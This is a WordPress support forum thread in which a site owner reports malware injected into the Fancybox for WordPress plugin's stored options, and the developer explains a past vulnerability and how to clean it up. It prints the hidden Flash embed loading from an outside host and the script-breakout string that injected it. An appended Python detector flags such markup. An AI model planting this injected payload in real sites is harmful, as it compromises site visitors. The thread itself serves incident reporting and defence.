Title: Malware?
Last modified: August 30, 2016

---

# Malware?

 *  Resolved [acurran](https://wordpress.org/support/users/acurran/)
 * (@acurran)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/)
 * I noticed suspicious code on one of the websites that I manage. After investigating
   further I discovered that the suspicious code appears only when Fancybox for 
   WordPress (v. 3.0.6) is activated. Below is the suspicious code. Is this plugin
   infected with malware?
 * ```
   <!-- Start of StatCounter Code for Default Guide -->
   <object type="application/x-shockwave-flash" data="http://www.weathershieldlimited.com/images/banners/eaj.swf?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1px" height="1px" id="cea0d16fdd2e07f5498e0c64ebd186a2">
   <param name="AllowScriptAccess" value="always"/>
   <param name="myid" value="cea0d16fdd2e07f5498e0c64ebd186a2" />
   <param name="movie" value="http://www.weathershieldlimited.com/images/banners/eaj.swf?myid=cea0d16fdd2e07f5498e0c64ebd186a2"/>
   <embed src="http://www.weathershieldlimited.com/images/banners/eaj.swf?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1" height="1"> </embed>
   </object>
   <!-- End of StatCounter Code for Default Guide -->
   ```
 * [https://wordpress.org/plugins/fancybox-for-wordpress/](https://wordpress.org/plugins/fancybox-for-wordpress/)

Viewing 3 replies - 1 through 3 (of 3 total)

 *  Thread Starter [acurran](https://wordpress.org/support/users/acurran/)
 * (@acurran)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/#post-6375953)
 * Upon further investigation I’ve found that the suspicious code is in the options.
   The mfbfw option contains the malware code and injects into the Fancybox for 
   WP header output. Anyone have any ideas how this compromise could have happened?
   Here is what was in the mfbfw option:
 * ```
   a:3:{s:10:"extraCalls";s:1:" ";s:13:"transitionOut";s:762:"",'centerOnScroll':false});})
   </script> <!-- Start of StatCounter Code for Default Guide --> <object type="application/x-shockwave-flash" data="http://www.weathershieldlimited.com/images/banners/eaj.swf?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1px" height="1px" id="cea0d16fdd2e07f5498e0c64ebd186a2"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="cea0d16fdd2e07f5498e0c64ebd186a2" /> <param name="movie" value="http://www.weathershieldlimited.com/images/banners/eaj.swf?myid=cea0d16fdd2e07f5498e0c64ebd186a2"/> <embed src="http://www.weathershieldlimited.com/images/banners/eaj.swf?myid=cea0d16fdd2e07f5498e0c64ebd186a2" width="1" height="1"> </embed> </object> <!-- End of StatCounter Code for Default Guide --> <script>({";s:16:"extraCallsEnable";s:3:"off";}
   ```
 *  [Jose Pardilla](https://wordpress.org/support/users/moskis/)
 * (@moskis)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/#post-6376003)
 * Hi acurran,
 * Sorry for the inconvenience.
 * There was a vulnerability in version 3.0.2 that was exploited for a brief period
   of time and patched as soon as it became known in February ([more info](https://wordpress.org/plugins/fancybox-for-wordpress/faq/)).
   It’s likely the breach occurred back then, and the malware code remained in the
   database since then, or it might have occurred recently if the plugin was not
   up to date.
 * Make sure to remove the malware if you haven’t already (if unsure, you can use
   the reset settings button to clean it), and check all instances of the plugin
   on other WordPress installations are clean and up to date.
 *  Thread Starter [acurran](https://wordpress.org/support/users/acurran/)
 * (@acurran)
 * [10 years, 10 months ago](https://wordpress.org/support/topic/malware-45/#post-6376047)
 * Thanks for the response Jose
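
An added example, not part of the thread or the plugin's code: a Python check that parses a PHP-serialized option value such as the `mfbfw` dump above and reports which settings contain markup, useful when checking other installations as suggested in the reply. It handles only the array, string, integer, boolean and null types; the function names are hypothetical and the sample value is constructed with a placeholder URL.

```python
import re

# Markup that should never appear in a setting echoed into the page's <script> block.
SUSPICIOUS = re.compile(rb"</script|<script|<object|<embed|<iframe|AllowScriptAccess", re.I)

def parse(buf, pos=0):
    """Parse one PHP-serialized value (types a, s, i, b, N); return (value, next_pos)."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, pos + 2
    if tag in (b"i", b"b"):                           # i:5;  b:1;
        end = buf.index(b";", pos)
        return int(buf[pos + 2:end]), end + 1
    colon = buf.index(b":", pos + 2)                  # colon after the length/count
    size, pos2 = int(buf[pos + 2:colon]), colon + 2   # pos2 skips :" or :{
    if tag == b"s":                                   # s:LEN:"bytes";
        if buf[pos2 + size:pos2 + size + 2] != b'";':
            raise ValueError("declared string length does not match at offset %d" % pos)
        return buf[pos2:pos2 + size], pos2 + size + 2
    if tag == b"a":                                   # a:COUNT:{key value ...}
        out = {}
        for _ in range(size):
            key, pos2 = parse(buf, pos2)
            out[key], pos2 = parse(buf, pos2)
        return out, pos2 + 1                          # skip }
    raise ValueError("unsupported type %r at offset %d" % (tag, pos))

def find_injected(value, path=""):
    """Return [(setting path, [markers found])] for every string value holding markup."""
    hits = []
    if isinstance(value, dict):
        for k, v in value.items():
            hits += find_injected(v, path + "/" + (k.decode() if isinstance(k, bytes) else str(k)))
    elif isinstance(value, bytes):
        markers = sorted({m.group().lower().decode() for m in SUSPICIOUS.finditer(value)})
        if markers:
            hits.append((path, markers))
    return hits

def php_s(text):
    raw = text.encode()                               # PHP string lengths count bytes
    return b's:%d:"%s";' % (len(raw), raw)

# Constructed sample shaped like the option in the thread; example.invalid is a placeholder.
INJECTED = ('"});</script><object data="http://example.invalid/x.swf">'
            '<param name="AllowScriptAccess" value="always"/></object><script>({')
SAMPLE = (b"a:3:{" + php_s("extraCalls") + php_s(" ") + php_s("transitionOut")
          + php_s(INJECTED) + php_s("extraCallsEnable") + php_s("off") + b"}")

if __name__ == "__main__": print(find_injected(parse(SAMPLE)[0]))
```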
